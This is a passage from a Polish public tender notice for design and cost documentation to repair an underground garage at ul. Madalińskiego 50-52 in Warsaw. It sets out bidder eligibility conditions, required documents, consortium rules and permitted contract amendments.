                          uprawnienia osób, które będą wykonywały zamówienie i ich aktualne
                          zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu 
                          Zawodowego. 
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
              osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych 
              innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi 
              stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
              Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji 
              zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie 
              podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres 
              korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
             wskazującą, który konkretny zasób jest udostępniany. W przypadku 
             udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać 
             osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku 
             udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę 
             uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W 
             przypadku udostępnienia potencjału technicznego należy wskazać przekazanie 
             do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń 
              technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia  
              zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do 
              dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej 
              odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci 
              posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia.

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,


Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej          
                         braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającą posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 20.000 PLN.
                         Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i 
                         finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego 
                         dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od 
                         odpowiedzialności  cywilnej w zakresie prowadzonej działalności 
                         związanej z przedmiotem zamówienia potwierdzającej posiadanie ww 
                         ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 20.000 PLN.
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
              osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych 
              innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi 
              stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
              Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji 
              zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie 
              podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres 
              korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
             wskazującą, który konkretny zasób jest udostępniany. W przypadku 
             udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać 
             osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku 
             udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę 
             uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W 
             przypadku udostępnienia potencjału technicznego należy wskazać przekazanie 
             do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń 
              technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia  
              zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do 
              dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej 
              odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci 
              posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia.

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,


Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu .
    1.1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 17. 
             specyfikacji istotnych warunków zamówienia i w formie określonej w  
             specyfikacji:
1.1.1. wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia, 
1.1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.6.1.2. specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,  
1.1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.1.4. informację o części - częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,  
1.1.5. informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
             1.1.6. oświadczenie o zapoznaniu się i akceptacji założeń projektowych i 
                          kosztorysowych na wykonanie dokumentacji projektowo-kosztorysowej 
                       na wykonanie remontu podziemnej hali garażowej na terenie posesji przy
                          ul. Madalińskiego 50-52 w Warszawie na podstawie Ekspertyzy 
                          Technicznej na temat stanu technicznego konstrukcji oraz przyczyn 
                          powstawania przecieków do podziemnej hali garażowej w budynku 
                          mieszkalno-użytkowym przy ul. Madalińskiego 50-52 w Warszawie 
                          opracowanej w 2013r.
1.1.7.zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
  1.1.8.	oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 20.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy 
                dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
             1.1.9. informacji określonej w pkt. 18.1.1. specyfikacji w przypadku    
                           zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od   
                           towarów i usług, obowiązującej w dacie składania ofert.

    1.2. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
             1.2.1. oświadczenie na załączniku nr 3 do oferty wg wzoru załączonego do 
                         wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1
                         ustawy Prawo zamówień publicznych, 
1.2.2.wykaz głównych usług, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1.  specyfikacji na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, 
1.2.3.wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.2. specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.2.4.opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 20.000 PLN.
1.2.5.dowody dotyczące usług, określające czy usługi te, (wykazane przez Wykonawcę w załączniku nr 4 do oferty, zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania ww dowodów.
1.2.6. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            1.2.6.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            1.2.6.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           1.2.6.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.
                             SIWZ.
                       
   1.3. W celu wykazania braku podstaw do wykluczenia z postępowania  o 
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
1.3.1. oświadczenie na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
1.3.2.aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
1.3.3.Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.6. i 9.3 i-lub 9.7. SIWZ, odnoszące się do tych podmiotów.
   1.4.  W celu wykazania braku podstaw do wykluczenia z postępowania  o   
             udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w  
             art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z 
             ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa 
             w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy 
             kapitałowej - wzór druku stanowi załącznik nr 8 do oferty wg wzoru 
             załączonego do wzoru formularza oferty.

   1.5.   W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom   
              określonym przez Zamawiającego  w SIWZ; 
              Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane 
              usługi  odpowiadają wymaganiom określonym przez Zamawiającego. Za 
              spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 
              9.2.1. SIWZ i wypełnienie formularza oferty.

   1.6. Oferta wspólna
    1.6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub 
                   więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 
                   Ustawy) pod warunkiem, że żaden z Wykonawców wspólnie ubiegających 
                   się o udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 
                   ust. 1 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie 
                   następujące wymagania: 
                 1.6.1.1.Wykonawcy występujący wspólnie są zobowiązani do 
                                ustanowienia Pełnomocnika do reprezentowania ich w 
                                postępowaniu albo do reprezentowania ich w postępowaniu i 
                                zawarcia umowy w sprawie przedmiotowego zamówienia 
                                publicznego;
1.6.1.2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
1.6.1.3.Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
1.6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę  wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.2.4. i-lub 9.7.1., 9.7.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
1.6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

     1.6.2. Wszelka korespondencja prowadzona będzie przez Zamawiającego  
                  wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu 
                  oferty.

     1.6.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, 
                 Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia 
                 publicznego, umowy regulującej współpracę tych Wykonawców.

             1.6.4. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie 
                            odpowiadać będą za wykonanie zamówienia.

     1.7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza 
              terytorium Rzeczypospolitej Polskiej.
             1.7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
                         Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.  
                         9.3.2. specyfikacji - składa dokument lub dokumenty wystawione 
  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające  
                          odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
                   Dokumenty, o których mowa w pkt. 9.7.1. SIWZ powinny być wystawione 
                   nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
             1.7.2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca   
                           ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o 
                           których mowa w pkt. 9.7.1., SIWZ zastępuje się je dokumentem 
                           zawierającym oświadczenie, w którym określa się także osoby 
                           uprawnione do reprezentacji Wykonawcy,  złożone przed notariuszem, 
                           właściwym organem sądowym, administracyjnym albo organem 
                           samorządu zawodowego lub gospodarczego odpowiednio miejsca 
                           zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub 
                           miejsce zamieszkania. Zapisy pkt. 9.7.1 SIWZ odnoszące się do 
                           wymaganych terminów ważności poszczególnych dokumentów stosuje się 
                           odpowiednio. jw.
            1.7.3.  W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania  
                         poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez 
                         nich w załącznikach do oferty częściowej i dokumentach wartości i kwoty  
                        w EURO będą przeliczane przez Zamawiającego wg średniego kursu NBP na dzień upublicznienia postępowania.

     1.8. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
     O KTÓRYCH MOWA W PKT 9.2.4., 9.2.5., 9.3.2.., 9.7.1.., 9.7.2., SPECYFIKACJI 
                DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA 
                ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji 
                istotnych warunków zamówienia przy czym w przypadku Wykonawców 
                wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 
                14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub 
                notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie
                dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich 
                prawdziwości.

     1.9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
              Dokumenty i oświadczenia sporządzone w języku obcym, są składane wraz z 
              tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                     umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                     okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                      lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                      możliwość zmiany umowy w szczególności w następujących przypadkach:
        a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
        umowy wraz ze skutkami takiej zmiany regulacji prawnych;
        b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej 
        umowy;
        c) zmiany zakresu rzeczowego i finansowego;
                     d)  zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
               e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
               zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
               nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
               koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
               przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
               cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
               albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
               Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
               Ustawy pzp, w celu wykazania spełniania warunków udziału w 
               postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
               obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
               lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
               wymagany w trakcie postępowania o udzielenie zamówienia będącego 
               przedmiotem zamówienia;
                      f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                      wydłużających-wykraczających poza ustawowe terminy procedur 
                      administracyjnych oraz innych terminów spraw urzędowych, mających 
                      wpływ na termin realizacji przedmiotu umowy.

      2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod 
                     rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
